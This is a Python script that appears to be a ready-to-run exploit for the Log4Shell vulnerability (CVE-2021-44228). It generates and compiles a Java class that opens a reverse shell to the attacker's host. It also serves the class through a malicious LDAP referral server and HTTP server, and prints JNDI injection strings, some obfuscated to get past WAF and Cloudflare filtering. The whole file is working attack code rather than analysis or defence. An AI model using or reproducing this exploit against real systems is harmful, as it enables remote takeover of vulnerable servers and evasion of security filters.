CVE-2021-44228-exploit.py

import argparse
import subprocess
import threading
import os, sys
from pathlib import Path
from http.server import HTTPServer, SimpleHTTPRequestHandler

os.system("")
current_path=os.getcwd()
# Creates HTTP directory to store and serve java payload
HTTP_Path=os.path.join(os.getcwd(),"HTTP")
if not os.path.exists(HTTP_Path) or not os.path.isdir(HTTP_Path):
    os.mkdir(HTTP_Path)

class bcolors:
    HEADER = '\033[95m';OKBLUE = '\033[94m'
    OKGREEN = '\033[92m';WARNING = '\033[93m'
    FAIL = '\033[91m';ENDC = '\033[0m'
    BOLD = '\033[1m';UNDERLINE = '\033[4m'

def generate_payload(userip: str, lport: int, bypass:str):
    program = """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Exploit {

    public Exploit() throws Exception {
        String cmd;
        String OS = System.getProperty("os.name").toUpperCase();
        if (OS.contains("LINUX")) {
            OS    = "LINUX";
            cmd = "/bin/sh";
        } else {
            OS    = "WINDOWS";
            cmd = "cmd.exe";
        }
        String host="%s";
        int port=%d;
        Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
        Socket s=new Socket(host,port);
        InputStream pi=p.getInputStream(),
            pe=p.getErrorStream(),
            si=s.getInputStream();
        OutputStream po=p.getOutputStream(),so=s.getOutputStream();
        while(!s.isClosed()) {
            while(pi.available()>0)
                so.write(pi.read());
            while(pe.available()>0)
                so.write(pe.read());
            while(si.available()>0)
                po.write(si.read());
            so.flush();
            po.flush();
            Thread.sleep(50);
            try {
                p.exitValue();
                break;
            }
            catch (Exception e){
            }
        };
        p.destroy();
        s.close();
    }
}
""" % (userip, lport)


    # writing the exploit to Exploit.java file

    p = Path(HTTP_Path,"Exploit.java")
    try:
        p.write_text(program)
        subprocess.run(["javac",str(p)])
    except OSError as e:
        print('{0}[-] Something went wrong {1}{2}'.format(bcolors.FAIL,e,bcolors.ENDC))
        raise e
    else:
        print('{0}[+] Exploit java class created success{1}'.format(bcolors.OKGREEN,bcolors.ENDC))


def payload(userip: str, webport: int, lport: int, bypass:str):
    generate_payload(userip, lport, bypass)

    print('{0}[+] Setting up LDAP server\n{1}'.format(bcolors.OKGREEN,bcolors.ENDC))

    # create the LDAP server on new thread
    t1 = threading.Thread(target=ldap_server, args=(userip, webport, bypass))
    t1.start()

    # start the web server
    os.chdir(HTTP_Path)
    print("{0}[+] Starting Webserver on port {1} http://0.0.0.0:{1}{2}".format(bcolors.OKGREEN,webport,bcolors.ENDC))
    httpd = HTTPServer(('0.0.0.0', webport), SimpleHTTPRequestHandler)
    httpd.serve_forever()
    
def check_java() -> bool:
    exit_code = subprocess.call(['java','-version',
    ], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
    return exit_code == 0


def ldap_server(userip: str, lport: int,bypass: str):
    sendme = "${jndi:ldap://%s:1389/a}" % (userip)
    if bypass.upper() == "WAF":
        sendme += "\n[!] !WAF Payload!"
        sendme += "\n[+] Try me: ${jndi:ldap://%s:1389/ a}" % (userip)
        sendme += "\n[+] Try me: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://%s:1389/ a}" % (userip)
        sendme += "\n[+] Try me: ${${::-j}ndi:rmi://%s:1389/ a}" % (userip)
        sendme += "\n[+] Try me: ${jndi:rmi://%s:1389/ a}" % (userip)
        
    if bypass.capitalize() == "Methods":
        sendme += "\n[!] !Methods Payload!"
        sendme += "\n[+] Try me: ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//%s:1389/ a}" % (userip)

    if bypass.capitalize() == "Cloudflare":
        sendme += "\n[!] !Cloudflare Payload!"
        sendme += "\n[+] Try me: ${jndi:${lower:l}${lower:d}a${lower:p}://%s:1389/ a}" % (userip)
        
        
        
    print("{0}\n[+] Send me: {1}\n{2}".format(bcolors.OKGREEN,sendme,bcolors.ENDC))

    url = "http://{0}:{1}/#Exploit".format(userip, lport)
    subprocess.run(["java","-cp",os.path.join(current_path, "target/marshalsec-0.0.3-SNAPSHOT-all.jar"),"marshalsec.jndi.LDAPRefServer",
        url,
    ])


def main():
    print( """{0}
[!] CVE: CVE-2021-44228
[!] This is simple Log4j exploit to get reverse shell
[!] Reference: https://akashpatil.me/log4j-guide-book.html{1}
""".format(bcolors.OKBLUE,bcolors.ENDC))

    parser = argparse.ArgumentParser(description='log4shell Reverse shell exploit')
    parser.add_argument('--userip',
                        metavar='userip',
                        type=str,
                        default='localhost',
                        help='Enter IP for LDAPRefServer & Shell')
    parser.add_argument('--webport',
                        metavar='webport',
                        type=int,
                        default='8000',
                        help='listener port for HTTP port')
    parser.add_argument('--lport',
                        metavar='lport',
                        type=int,
                        default='9001',
                        help='Netcat Port')
    parser.add_argument('-b',"--bypass",
                        metavar='bypass',
                        type=str,
                        default='None',
                        help='Type of bypass payload. None/WAF/Methods/Cloudflare. Methods - "ldap", "jndi", or the ${lower:x} method restriction bypass')


    args = parser.parse_args()

    try:
        if not check_java():
            print('{0}[-] Java is not installed inside the repository{1}'.format(bcolors.FAIL,bcolors.ENDC))
            sys.exit(1)
        payload(args.userip, args.webport, args.lport, args.bypass)
    except KeyboardInterrupt:
        print( "{0}user interupted the program.{1}".format(bcolors.FAIL,bcolors.ENDC))
        sys.exit(1)


if __name__ == "__main__":
    main()